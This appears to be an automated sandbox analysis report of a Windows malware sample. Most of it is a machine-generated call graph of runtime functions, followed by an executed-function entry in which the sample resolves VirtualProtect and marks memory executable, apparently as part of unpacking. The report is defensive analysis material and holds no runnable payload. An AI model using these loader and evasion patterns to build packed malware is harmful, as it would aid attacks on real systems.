11889->11890 11891 40ae84 11889->11891 11890->11891 11892 40ae96 11891->11892 11893 405342 _free 66 API calls 11891->11893 11894 40aea8 11892->11894 11896 405342 _free 66 API calls 11892->11896 11893->11892 11895 40aeba 11894->11895 11897 405342 _free 66 API calls 11894->11897 11898 405342 _free 66 API calls 11895->11898 11895->11899 11896->11894 11897->11895 11898->11899 11899->11839 11901 40aa54 11900->11901 12073 405fb3 11900->12073 11902 405342 _free 66 API calls 11901->11902 11903 40aa5c 11902->11903 11904 405342 _free 66 API calls 11903->11904 11905 40aa64 11904->11905 11906 405342 _free 66 API calls 11905->11906 11907 40aa6c 11906->11907 11908 405342 _free 66 API calls 11907->11908 11909 40aa74 11908->11909 11910 405342 _free 66 API calls 11909->11910 11911 40aa7c 11910->11911 11912 405342 _free 66 API calls 11911->11912 11913 40aa84 11912->11913 11914 405342 _free 66 API calls 11913->11914 11915 40aa8b 11914->11915 11916 405342 _free 66 API calls 11915->11916 11917 40aa93 11916->11917 11918 405342 _free 66 API calls 11917->11918 11919 40aa9b 11918->11919 11920 405342 _free 66 API calls 11919->11920 11921 40aaa3 11920->11921 11922 405342 _free 66 API calls 11921->11922 11923 40aaab 11922->11923 11924 405342 _free 66 API calls 11923->11924 11925 40aab3 11924->11925 11926 405342 _free 66 API calls 11925->11926 11927 40aabb 11926->11927 11928 405342 _free 66 API calls 11927->11928 11929 40aac3 11928->11929 11930 405342 _free 66 API calls 11929->11930 11931 40aacb 11930->11931 11932 405342 _free 66 API calls 11931->11932 11933 40aad3 11932->11933 11934 405342 _free 66 API calls 11933->11934 11935 40aade 11934->11935 11936 405342 _free 66 API calls 11935->11936 11937 40aae6 11936->11937 11938 405342 _free 66 API calls 11937->11938 11939 40aaee 11938->11939 11940 405342 _free 66 API calls 11939->11940 11941 40aaf6 11940->11941 11942 405342 _free 66 API calls 11941->11942 11943 40aafe 11942->11943 11944 405342 _free 66 API calls 11943->11944 11945 40ab06 11944->11945 11946 405342 _free 66 API calls 11945->11946 11947 40ab0e 11946->11947 11948 405342 _free 66 API calls 11947->11948 11949 40ab16 11948->11949 11950 405342 _free 66 API calls 11949->11950 11951 40ab1e 11950->11951 11952 405342 _free 66 API calls 11951->11952 11953 40ab26 11952->11953 11954 405342 _free 66 API calls 11953->11954 11955 40ab2e 11954->11955 11956 405342 _free 66 API calls 11955->11956 11957 40ab36 11956->11957 11958 405342 _free 66 API calls 11957->11958 11959 40ab3e 11958->11959 11960 405342 _free 66 API calls 11959->11960 11961 40ab46 11960->11961 11962 405342 _free 66 API calls 11961->11962 11963 40ab4e 11962->11963 11964 405342 _free 66 API calls 11963->11964 11965 40ab56 11964->11965 11966 405342 _free 66 API calls 11965->11966 11967 40ab64 11966->11967 11968 405342 _free 66 API calls 11967->11968 11969 40ab6f 11968->11969 11970 405342 _free 66 API calls 11969->11970 11971 40ab7a 11970->11971 11972 405342 _free 66 API calls 11971->11972 11973 40ab85 11972->11973 11974 405342 _free 66 API calls 11973->11974 11975 40ab90 11974->11975 11976 405342 _free 66 API calls 11975->11976 11977 40ab9b 11976->11977 11978 405342 _free 66 API calls 11977->11978 11979 40aba6 11978->11979 11980 405342 _free 66 API calls 11979->11980 11981 40abb1 11980->11981 11982 405342 _free 66 API calls 11981->11982 11983 40abbc 11982->11983 11984 405342 _free 66 API calls 11983->11984 11985 40abc7 11984->11985 11986 405342 _free 66 API calls 11985->11986 11987 40abd2 11986->11987 11988 405342 _free 66 API calls 11987->11988 11989 40abdd 11988->11989 11990 405342 _free 66 API calls 11989->11990 11991 40abe8 11990->11991 11992 405342 _free 66 API calls 11991->11992 11993 40abf3 11992->11993 11994 405342 _free 66 API calls 11993->11994 11995 40abfe 11994->11995 11996 405342 _free 66 API calls 11995->11996 11997 40ac09 11996->11997 11998 405342 _free 66 API calls 11997->11998 11999 40ac17 11998->11999 12000 405342 _free 66 API calls 11999->12000 12001 40ac22 12000->12001 12002 405342 _free 66 API calls 12001->12002 12003 40ac2d 12002->12003 12004 405342 _free 66 API calls 12003->12004 12005 40ac38 12004->12005 12006 405342 _free 66 API calls 12005->12006 12007 40ac43 12006->12007 12008 405342 _free 66 API calls 12007->12008 12009 40ac4e 12008->12009 12010 405342 _free 66 API calls 12009->12010 12011 40ac59 12010->12011 12012 405342 _free 66 API calls 12011->12012 12013 40ac64 12012->12013 12014 405342 _free 66 API calls 12013->12014 12015 40ac6f 12014->12015 12016 405342 _free 66 API calls 12015->12016 12017 40ac7a 12016->12017 12018 405342 _free 66 API calls 12017->12018 12019 40ac85 12018->12019 12020 405342 _free 66 API calls 12019->12020 12021 40ac90 12020->12021 12022 405342 _free 66 API calls 12021->12022 12023 40ac9b 12022->12023 12024 405342 _free 66 API calls 12023->12024 12025 40aca6 12024->12025 12026 405342 _free 66 API calls 12025->12026 12027 40acb1 12026->12027 12028 405342 _free 66 API calls 12027->12028 12029 40acbc 12028->12029 12030 405342 _free 66 API calls 12029->12030 12031 40acca 12030->12031 12032 405342 _free 66 API calls 12031->12032 12033 40acd5 12032->12033 12034 405342 _free 66 API calls 12033->12034 12035 40ace0 12034->12035 12036 405342 _free 66 API calls 12035->12036 12037 40aceb 12036->12037 12038 405342 _free 66 API calls 12037->12038 12039 40acf6 12038->12039 12040 405342 _free 66 API calls 12039->12040 12041 40ad01 12040->12041 12042 405342 _free 66 API calls 12041->12042 12043 40ad0c 12042->12043 12044 405342 _free 66 API calls 12043->12044 12045 40ad17 12044->12045 12046 405342 _free 66 API calls 12045->12046 12047 40ad22 12046->12047 12048 405342 _free 66 API calls 12047->12048 12049 40ad2d 12048->12049 12050 405342 _free 66 API calls 12049->12050 12051 40ad38 12050->12051 12052 405342 _free 66 API calls 12051->12052 12053 40ad43 12052->12053 12054 405342 _free 66 API calls 12053->12054 12055 40ad4e 12054->12055 12056 405342 _free 66 API calls 12055->12056 12057 40ad59 12056->12057 12058 405342 _free 66 API calls 12057->12058 12059 40ad64 12058->12059 12060 405342 _free 66 API calls 12059->12060 12061 40ad6f 12060->12061 12062 405342 _free 66 API calls 12061->12062 12063 40ad7d 12062->12063 12064 405342 _free 66 API calls 12063->12064 12065 40ad88 12064->12065 12066 405342 _free 66 API calls 12065->12066 12067 40ad93 12066->12067 12068 405342 _free 66 API calls 12067->12068 12069 40ad9e 12068->12069 12070 405342 _free 66 API calls 12069->12070 12071 40ada9 12070->12071 12072 405342 _free 66 API calls 12071->12072 12072->12073 12073->11844 12074->11815 12076 4057f5 12075->12076 12078 405741 _memset 12075->12078 12081 401114 setSBUpLow 5 API calls 12076->12081 12085 40a204 12078->12085 12083 40589b 12081->12083 12083->11774 12084 40a0d7 ___crtLCMapStringA 82 API calls 12084->12076 12086 402284 _LocaleUpdate::_LocaleUpdate 76 API calls 12085->12086 12087 40a217 12086->12087 12095 40a11d 12087->12095 12090 40a0d7 12091 402284 _LocaleUpdate::_LocaleUpdate 76 API calls 12090->12091 12092 40a0ea 12091->12092 12112 409ef0 12092->12112 12096 40a146 MultiByteToWideChar 12095->12096 12097 40a13b 12095->12097 12098 40a16f 12096->12098 12101 40a173 12096->12101 12097->12096 12099 401114 setSBUpLow 5 API calls 12098->12099 12100 4057b0 12099->12100 12100->12090 12102 40a188 _memset __crtLCMapStringA_stat 12101->12102 12103 4044b9 _malloc 66 API calls 12101->12103 12102->12098 12104 40a1c1 MultiByteToWideChar 12102->12104 12103->12102 12105 40a1d7 GetStringTypeW 12104->12105 12106 40a1e8 12104->12106 12105->12106 12108 4092cc 12106->12108 12109 4092d8 12108->12109 12110 4092e9 12108->12110 12109->12110 12111 405342 _free 66 API calls 12109->12111 12110->12098 12111->12110 12113 409f0e MultiByteToWideChar 12112->12113 12115 409f6c 12113->12115 12118 409f73 12113->12118 12116 401114 setSBUpLow 5 API calls 12115->12116 12117 4057d0 12116->12117 12117->12084 12122 4044b9 _malloc 66 API calls 12118->12122 12126 409f8c __crtLCMapStringA_stat 12118->12126 12119 409fc0 MultiByteToWideChar 12120 40a0b8 12119->12120 12121 409fd9 LCMapStringW 12119->12121 12124 4092cc __freea 66 API calls 12120->12124 12121->12120 12123 409ff8 12121->12123 12122->12126 12125 40a002 12123->12125 12129 40a02b 12123->12129 12124->12115 12125->12120 12127 40a016 LCMapStringW 12125->12127 12126->12115 12126->12119 12127->12120 12128 40a07a LCMapStringW 12130 40a090 WideCharToMultiByte 12128->12130 12131 40a0b2 12128->12131 12132 40a046 __crtLCMapStringA_stat 12129->12132 12133 4044b9 _malloc 66 API calls 12129->12133 12130->12131 12134 4092cc __freea 66 API calls 12131->12134 12132->12120 12132->12128 12133->12132 12134->12120 12136->11777 12140 403121 DecodePointer 12137->12140 12141 403136 12140->12141 12142 4030e2 __invoke_watson 10 API calls 12141->12142 12143 40314d 12142->12143 12144 403121 __invalid_parameter_noinfo_noreturn 10 API calls 12143->12144 12145 40315a 12144->12145 12145->11704 12147 405075 EncodePointer 12146->12147 12147->12147 12148 40508f 12147->12148 12148->11391 12152 40124a 12149->12152 12151 401293 12151->11393 12153 401256 _raise 12152->12153 12160 401ab7 12153->12160 12159 401277 _raise 12159->12151 12161 4047fa __lock 66 API calls 12160->12161 12162 40125b 12161->12162 12163 401163 DecodePointer DecodePointer 12162->12163 12164 401191 12163->12164 12165 401212 12163->12165 12164->12165 12177 401a41 12164->12177 12174 401280 12165->12174 12167 4011f5 EncodePointer EncodePointer 12167->12165 12168 4011c7 12168->12165 12171 4019a1 __realloc_crt 70 API calls 12168->12171 12172 4011e3 EncodePointer 12168->12172 12169 4011a3 12169->12167 12169->12168 12184 4019a1 12169->12184 12173 4011dd 12171->12173 12172->12167 12173->12165 12173->12172 12210 401ac0 12174->12210 12178 401a61 HeapSize 12177->12178 12179 401a4c 12177->12179 12178->12169 12180 40177e __configthreadlocale 66 API calls 12179->12180 12181 401a51 12180->12181 12182 40314e __configthreadlocale 11 API calls 12181->12182 12183 401a5c 12182->12183 12183->12169 12188 4019aa 12184->12188 12186 4019e9 12186->12168 12187 4019ca Sleep 12187->12188 12188->12186 12188->12187 12189 40454d 12188->12189 12190 404563 12189->12190 12191 404558 12189->12191 12193 40456b 12190->12193 12201 404578 12190->12201 12192 4044b9 _malloc 66 API calls 12191->12192 12194 404560 12192->12194 12195 405342 _free 66 API calls 12193->12195 12194->12188 12209 404573 _rand_s 12195->12209 12196 4045b0 12197 404452 _malloc DecodePointer 12196->12197 12199 4045b6 12197->12199 12198 404580 HeapReAlloc 12198->12201 12198->12209 12202 40177e __configthreadlocale 66 API calls 12199->12202 12200 4045e0 12204 40177e __configthreadlocale 66 API calls 12200->12204 12201->12196 12201->12198 12201->12200 12203 404452 _malloc DecodePointer 12201->12203 12206 4045c8 12201->12206 12202->12209 12203->12201 12205 4045e5 GetLastError 12204->12205 12205->12209 12207 40177e __configthreadlocale 66 API calls 12206->12207 12208 4045cd GetLastError 12207->12208 12208->12209 12209->12188 12213 404709 LeaveCriticalSection 12210->12213 12212 401285 12212->12159 12213->12212 12217 408b24 12214->12217 12218 402284 _LocaleUpdate::_LocaleUpdate 76 API calls 12217->12218 12219 408b37 12218->12219 12219->11398 12221 5cbb0d __write_nolock 12220->12221 12222 5cbb32 GetTickCount SetLastError GetConsoleAliasesW 12221->12222 12228 5cbb6c 12221->12228 12223 5cbb20 12222->12223 12224 5cbb55 12222->12224 12223->12221 12225 5cbb5e CreateDirectoryW 12224->12225 12226 5cbb68 12224->12226 12225->12226 12226->12228 12227 5cbbaf 12229 5cbbbc InterlockedIncrement DestroyIcon 12227->12229 12230 5cbc58 12227->12230 12228->12227 12231 5cbba5 ResetEvent 12228->12231 12266 4066f0 12229->12266 12233 5cbc8d OpenJobObjectA 12230->12233 12234 5cbca3 10 API calls 12230->12234 12262 5cbe19 12230->12262 12231->12228 12233->12234 12271 40129d 12234->12271 12238 5cbe21 12264 5cb920 LoadLibraryA 12238->12264 12239 5cbc28 GetStartupInfoW 12240 5cbc30 12239->12240 12241 5cbc4d 12240->12241 12242 5cbc39 GetModuleHandleExA 12240->12242 12268 401010 12241->12268 12242->12241 12243 5cbda7 12288 401123 12243->12288 12248 5cbe83 12265 5cb070 LoadLibraryW GetProcAddress VirtualProtect 12248->12265 12249 401123 _calloc 66 API calls 12251 5cbdbf _memset 12249->12251 12254 401123 _calloc 66 API calls 12251->12254 12252 5cbe88 12302 5cba50 12252->12302 12255 5cbdf9 12254->12255 12259 401286 __cinit 76 API calls 12255->12259 12256 5cbef1 12256->12256 12257 5cbec5 SetProcessWorkingSetSize 12258 5cbe92 12257->12258 12258->12256 12258->12257 12260 5cbe0f 12259->12260 12295 401427 12260->12295 12263 5cb040 LocalAlloc 12262->12263 12263->12238 12264->12248 12265->12252 12267 4066fc SetDefaultCommConfigW FreeEnvironmentStringsW GetCurrentDirectoryA EnumDateFormatsExA 12266->12267 12267->12239 12267->12240 12311 5cc0f0 12268->12311 12270 40101f 12270->12230 12272 4012a9 _raise 12271->12272 12273 4012b7 12272->12273 12274 4012cc __flsbuf 12272->12274 12275 40177e __configthreadlocale 66 API calls 12273->12275 12367 402117 12274->12367 12276 4012bc 12275->12276 12278 40314e __configthreadlocale 11 API calls 12276->12278 12280 4012c7 _raise 12278->12280 12279 4012de __flsbuf 12372 4021b4 12279->12372 12280->12243 12282 4012f0 __flsbuf 12379 4023ca 12282->12379 12284 401308 __flsbuf 12400 402250 12284->12400 12289 401853 __calloc_crt 66 API calls 12288->12289 12290 40113d 12289->12290 12291 401159 12290->12291 12292 40177e __configthreadlocale 66 API calls 12290->12292 12291->12249 12293 401150 12292->12293 12293->12291 12294 40177e __configthreadlocale 66 API calls 12293->12294 12294->12291 12296 401433 12295->12296 12297 401447 12295->12297 12298 40177e __configthreadlocale 66 API calls 12296->12298 12297->12262 12299 401438 12298->12299 12300 40314e __configthreadlocale 11 API calls 12299->12300 12301 401443 12300->12301 12301->12262 12575 5cb990 12302->12575 12305 5cba89 FreeEnvironmentStringsW ReadEventLogA CreateNamedPipeA FileTimeToLocalFileTime 12306 5cbae4 12305->12306 12578 5cb9c0 12306->12578 12309 401114 setSBUpLow 5 API calls 12310 5cbaf9 12309->12310 12310->12258 12312 5cc0fd 12311->12312 12315 5cd091 __ctrlfp __floor_pentium4 12311->12315 12313 5cc12e 12312->12313 12312->12315 12319 5cc178 12313->12319 12322 5ccd9c 12313->12322 12314 5cd0ff __floor_pentium4 12321 5cd0ec __ctrlfp 12314->12321 12337 5ce7f1 12314->12337 12315->12314 12317 5cd0dc 12315->12317 12315->12321 12330 5ce73b 12317->12330 12319->12270 12321->12270 12323 5ccdb4 DecodePointer 12322->12323 12325 5ccdc2 12322->12325 12323->12325 12324 5cce5e 12324->12319 12325->12324 12326 5cceab 12325->12326 12327 5cce0f 12325->12327 12326->12324 12328 40177e __configthreadlocale 66 API calls 12326->12328 12327->12324 12329 40177e __configthreadlocale 66 API calls 12327->12329 12328->12324 12329->12324 12331 5ce749 12330->12331 12332 5ce771 12330->12332 12348 5ce69b 12331->12348 12334 40177e __configthreadlocale 66 API calls 12332->12334 12336 5ce776 __ctrlfp 12334->12336 12335 5ce76c 12335->12321 12336->12321 12338 5ce827 __handle_exc 12337->12338 12340 5ce84e __except1 12338->12340 12363 5ce10e 12338->12363 12341 5ce890 12340->12341 12343 5ce869 12340->12343 12342 5ce614 __except1 66 API calls 12341->12342 12345 5ce88b __ctrlfp 12342->12345 12344 5ce69b __umatherr 66 API calls 12343->12344 12344->12345 12346 401114 setSBUpLow 5 API calls 12345->12346 12347 5ce8b4 12346->12347 12347->12321 12349 5ce6a5 12348->12349 12350 5ce71e __ctrlfp 12349->12350 12351 5ce6c0 __umatherr __ctrlfp 12349->12351 12352 5ce614 __except1 66 API calls 12350->12352 12354 5ce70e 12351->12354 12356 5ce614 12351->12356 12353 5ce733 12352->12353 12353->12335 12354->12335 12357 5ce61f 12356->12357 12358 5ce634 12356->12358 12360 5ce639 12357->12360 12361 40177e __configthreadlocale 66 API calls 12357->12361 12359 40177e __configthreadlocale 66 API calls 12358->12359 12359->12360 12360->12354 12362 5ce62c 12361->12362 12362->12354 12364 5ce135 __raise_exc_ex 12363->12364 12365 5ce328 RaiseException 12364->12365 12366 5ce341 12365->12366 12366->12340 12368 402124 12367->12368 12369 40213a EnterCriticalSection 12367->12369 12370 4047fa __lock 66 API calls 12368->12370 12369->12279 12371 40212d 12370->12371 12371->12279 12408 405654 12372->12408 12374 4021c3 12415 4055fe 12374->12415 12376 402216 12376->12282 12377 4021c9 __flsbuf 12377->12376 12378 401910 __malloc_crt 66 API calls 12377->12378 12378->12376 12380 402284 _LocaleUpdate::_LocaleUpdate 76 API calls 12379->12380 12381 402431 12380->12381 12382 402435 12381->12382 12384 405654 __flsbuf 66 API calls 12381->12384 12396 40246c __output_l __aulldvrm _strlen 12381->12396 12383 40177e __configthreadlocale 66 API calls 12382->12383 12385 40243a 12383->12385 12384->12396 12386 40314e __configthreadlocale 11 API calls 12385->12386 12387 402445 12386->12387 12388 401114 setSBUpLow 5 API calls 12387->12388 12389 402f51 12388->12389 12389->12284 12391 405342 _free 66 API calls 12391->12396 12392 402ac1 DecodePointer 12392->12396 12393 406420 78 API calls __cftof 12393->12396 12394 401910 __malloc_crt 66 API calls 12394->12396 12395 402b2a DecodePointer 12395->12396 12396->12382 12396->12387 12396->12391 12396->12392 12396->12393 12396->12394 12396->12395 12397 402b4b DecodePointer 12396->12397 12398 40231c 97 API calls _write_string 12396->12398 12399 40676a 97 API calls __output_l 12396->12399 12424 4064c0 12396->12424 12397->12396 12398->12396 12399->12396 12401 40225b 12400->12401 12403 401319 12400->12403 12401->12403 12427 405418 12401->12427 12404 401331 12403->12404 12405 401336 __flsbuf 12404->12405 12569 402185 12405->12569 12407 401341 12407->12280 12409 405660 12408->12409 12410 405675 12408->12410 12411 40177e __configthreadlocale 66 API calls 12409->12411 12410->12374 12412 405665 12411->12412 12413 40314e __configthreadlocale 11 API calls 12412->12413 12414 405670 12413->12414 12414->12374 12416 40561a 12415->12416 12417 40560b 12415->12417 12419 405638 12416->12419 12420 40177e __configthreadlocale 66 API calls 12416->12420 12418 40177e __configthreadlocale 66 API calls 12417->12418 12423 405610 12418->12423 12419->12377 12421 40562b 12420->12421 12422 40314e __configthreadlocale 11 API calls 12421->12422 12422->12423 12423->12377 12425 402284 _LocaleUpdate::_LocaleUpdate 76 API calls 12424->12425 12426 4064d3 12425->12426 12426->12396 12428 405453 12427->12428 12429 405431 12427->12429 12428->12403 12429->12428 12430 405654 __flsbuf 66 API calls 12429->12430 12431 40544c 12430->12431 12433 409d25 12431->12433 12434 409d31 _raise 12433->12434 12435 409d54 12434->12435 12436 409d39 12434->12436 12438 409d60 12435->12438 12442 409d9a 12435->12442 12458 401791 12436->12458 12439 401791 __close 66 API calls 12438->12439 12441 409d65 12439->12441 12444 40177e __configthreadlocale 66 API calls 12441->12444 12461 40c5ab 12442->12461 12443 40177e __configthreadlocale 66 API calls 12451 409d46 _raise 12443->12451 12446 409d6d 12444->12446 12448 40314e __configthreadlocale 11 API calls 12446->12448 12447 409da0 12449 409dc2 12447->12449 12450 409dae 12447->12450 12448->12451 12453 40177e __configthreadlocale 66 API calls 12449->12453 12471 409628 12450->12471 12451->12428 12454 409dc7 12453->12454 12456 401791 __close 66 API calls 12454->12456 12455 409dba 12530 409df1 12455->12530 12456->12455 12459 403f64 __getptd_noexit 66 API calls 12458->12459 12460 401796 12459->12460 12460->12443 12462 40c5b7 _raise 12461->12462 12463 40c611 12462->12463 12465 4047fa __lock 66 API calls 12462->12465 12464 40c616 EnterCriticalSection 12463->12464 12466 40c633 _raise 12463->12466 12464->12466 12467 40c5e3 12465->12467 12466->12447 12468 40c5ff 12467->12468 12469 40c5ec InitializeCriticalSectionAndSpinCount 12467->12469 12533 40c641 12468->12533 12469->12468 12472 409637 __write_nolock 12471->12472 12473 40968c 12472->12473 12474 40966d 12472->12474 12504 409662 12472->12504 12479 4096e8 12473->12479 12480 4096cb 12473->12480 12476 401791 __close 66 API calls 12474->12476 12475 401114 setSBUpLow 5 API calls 12478 409d23 12475->12478 12477 409672 12476->12477 12482 40177e __configthreadlocale 66 API calls 12477->12482 12478->12455 12481 4096fb 12479->12481 12537 40b573 12479->12537 12483 401791 __close 66 API calls 12480->12483 12486 4055fe __flsbuf 66 API calls 12481->12486 12485 409679 12482->12485 12487 4096d0 12483->12487 12488 40314e __configthreadlocale 11 API calls 12485->12488 12489 409704 12486->12489 12490 40177e __configthreadlocale 66 API calls 12487->12490 12488->12504 12491 4099a6 12489->12491 12496 403fdd __getptd 66 API calls 12489->12496 12492 4096d8 12490->12492 12494 4099b5 12491->12494 12495 409c56 WriteFile 12491->12495 12493 40314e __configthreadlocale 11 API calls 12492->12493 12493->12504 12497 409a70 12494->12497 12506 4099c8 12494->12506 12499 409988 12495->12499 12500 409c89 GetLastError 12495->12500 12498 40971f GetConsoleMode 12496->12498 12511 409a7d 12497->12511 12521 409b4a 12497->12521 12498->12491 12502 409748 12498->12502 12501 409cd4 12499->12501 12499->12504 12508 409ca7 12499->12508 12500->12499 12501->12504 12507 40177e __configthreadlocale 66 API calls 12501->12507 12502->12491 12503 409758 GetConsoleCP 12502->12503 12503->12499 12527 40977b 12503->12527 12504->12475 12505 409a12 WriteFile 12505->12500 12505->12506 12506->12499 12506->12501 12506->12505 12513 409cf7 12507->12513 12509 409cb2 12508->12509 12510 409cc6 12508->12510 12515 40177e __configthreadlocale 66 API calls 12509->12515 12550 4017a4 12510->12550 12511->12499 12511->12501 12512 409aec WriteFile 12511->12512 12512->12500 12512->12511 12518 401791 __close 66 API calls 12513->12518 12514 409bbb WideCharToMultiByte 12514->12500 12516 409bf2 WriteFile 12514->12516 12519 409cb7 12515->12519 12520 409c29 GetLastError 12516->12520 12516->12521 12518->12504 12523 401791 __close 66 API calls 12519->12523 12520->12521 12521->12499 12521->12501 12521->12514 12521->12516 12523->12504 12524 409827 WideCharToMultiByte 12524->12499 12526 409858 WriteFile 12524->12526 12525 40c3eb 78 API calls __fassign 12525->12527 12526->12500 12526->12527 12527->12499 12527->12500 12527->12524 12527->12525 12528 40c24d WriteConsoleW CreateFileW __write_nolock 12527->12528 12529 4098ac WriteFile 12527->12529 12547 4064f8 12527->12547 12528->12527 12529->12500 12529->12527 12568 40c64a LeaveCriticalSection 12530->12568 12532 409df7 12532->12451 12536 404709 LeaveCriticalSection 12533->12536 12535 40c648 12535->12463 12536->12535 12555 40c542 12537->12555 12539 40b591 12540 40b599 12539->12540 12541 40b5aa SetFilePointer 12539->12541 12542 40177e __configthreadlocale 66 API calls 12540->12542 12543 40b5c2 GetLastError 12541->12543 12544 40b59e 12541->12544 12542->12544 12543->12544 12545 40b5cc 12543->12545 12544->12481 12546 4017a4 __dosmaperr 66 API calls 12545->12546 12546->12544 12548 4064c0 __isleadbyte_l 76 API calls 12547->12548 12549 406507 12548->12549 12549->12527 12551 401791 __close 66 API calls 12550->12551 12552 4017af _rand_s 12551->12552 12553 40177e __configthreadlocale 66 API calls 12552->12553 12554 4017c2 12553->12554 12554->12504 12556 40c54f 12555->12556 12558 40c567 12555->12558 12557 401791 __close 66 API calls 12556->12557 12559 40c554 12557->12559 12560 401791 __close 66 API calls 12558->12560 12561 40c5a6 12558->12561 12562 40177e __configthreadlocale 66 API calls 12559->12562 12563 40c578 12560->12563 12561->12539 12564 40c55c 12562->12564 12565 40177e __configthreadlocale 66 API calls 12563->12565 12564->12539 12566 40c580 12565->12566 12567 40314e __configthreadlocale 11 API calls 12566->12567 12567->12564 12568->12532 12570 402195 12569->12570 12571 4021a8 LeaveCriticalSection 12569->12571 12574 404709 LeaveCriticalSection 12570->12574 12571->12407 12573 4021a5 12573->12407 12574->12573 12576 5cb9b5 12575->12576 12577 5cb9a1 HeapAlloc LoadLibraryA 12575->12577 12576->12305 12576->12306 12577->12576 12579 5cba08 12578->12579 12585 5cb9db 12578->12585 12580 5cba0f GetServiceKeyNameA 12579->12580 12581 5cba39 12579->12581 12580->12581 12582 401114 setSBUpLow 5 API calls 12581->12582 12584 5cba47 12582->12584 12583 5cb9e7 EndUpdateResourceW WritePrivateProfileStringW 12583->12585 12584->12309 12585->12579 12585->12583 12587 403e8c 12586->12587 12588 403e7d DecodePointer 12586->12588 12589 403e9d TlsFree 12587->12589 12590 403eab 12587->12590 12588->12587 12589->12590 12591 4046ce DeleteCriticalSection 12590->12591 12592 4046e6 12590->12592 12593 405342 _free 66 API calls 12591->12593 12594 4046f8 DeleteCriticalSection 12592->12594 12595 4041b9 12592->12595 12593->12590 12594->12592 12595->11304 12605 403df0 EncodePointer 12596->12605 12598 401ad1 __init_pointers __initp_misc_winsig 12606 4048b1 EncodePointer 12598->12606 12600 401af7 EncodePointer EncodePointer EncodePointer EncodePointer 12601 404668 12600->12601 12602 404673 12601->12602 12603 40467d InitializeCriticalSectionAndSpinCount 12602->12603 12604 4042aa 12602->12604 12603->12602 12603->12604 12604->11432 12604->11433 12605->12598 12606->12600 12610 401c34 12607->12610 12609 401d9b 12611 401c40 _raise 12610->12611 12612 4047fa __lock 61 API calls 12611->12612 12613 401c47 12612->12613 12615 401c72 DecodePointer 12613->12615 12619 401cf1 12613->12619 12616 401c89 DecodePointer 12615->12616 12615->12619 12629 401c9c 12616->12629 12618 401d6e _raise 12618->12609 12633 401d5f 12619->12633 12622 401d56 12623 401a9f __heap_alloc 3 API calls 12622->12623 12624 401d5f 12623->12624 12625 401d6c 12624->12625 12638 404709 LeaveCriticalSection 12624->12638 12625->12609 12626 401cb3 DecodePointer 12632 403df0 EncodePointer 12626->12632 12629->12619 12629->12626 12630 401cc2 DecodePointer DecodePointer 12629->12630 12631 403df0 EncodePointer 12629->12631 12630->12629 12631->12629 12632->12629 12634 401d65 12633->12634 12635 401d3f 12633->12635 12639 404709 LeaveCriticalSection 12634->12639 12635->12618 12637 404709 LeaveCriticalSection 12635->12637 12637->12622 12638->12625 12639->12635 12643 40383f 12640->12643 12641 408d30 _parse_cmdline 76 API calls 12641->12643 12642 4038ac 12644 4039aa 12642->12644 12645 408d30 76 API calls _parse_cmdline 12642->12645 12643->12641 12643->12642 12644->11456 12644->11458 12645->12642

                                                                                                                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                                                                                                                  Function 005CB070 Relevance: 26.5, APIs: 3, Strings: 12, Instructions: 233librarymemoryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 0 5cb070-5cb91c LoadLibraryW GetProcAddress VirtualProtect
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(005DDB30,0BB7EA7B,4BBE82DD,2FC43CC7,52860AB1,6AD71B2C,43FE4454,34026A25), ref: 005CB8E8
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,VirtualProtect), ref: 005CB8F4
                                                                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 005CB914
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressLibraryLoadProcProtectVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID: )?u$:/X$F(+$O8##$R'._$U99x$VirtualProtect$X2R$dFfX$v;^:$o:?$6
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3509694964-2834981808
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b384f59d4b4bb60364d658c9fb51883fdb790552a802292acc0393d197c4be19
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 114222216d86862ff262c135b643685e00db7299ddb832d236b655078086c967
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b384f59d4b4bb60364d658c9fb51883fdb790552a802292acc0393d197c4be19
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C02A6B400E385CBD2B09F469689B8EBBF0BB91708F618E0DD5DD1A224CB754589CF97
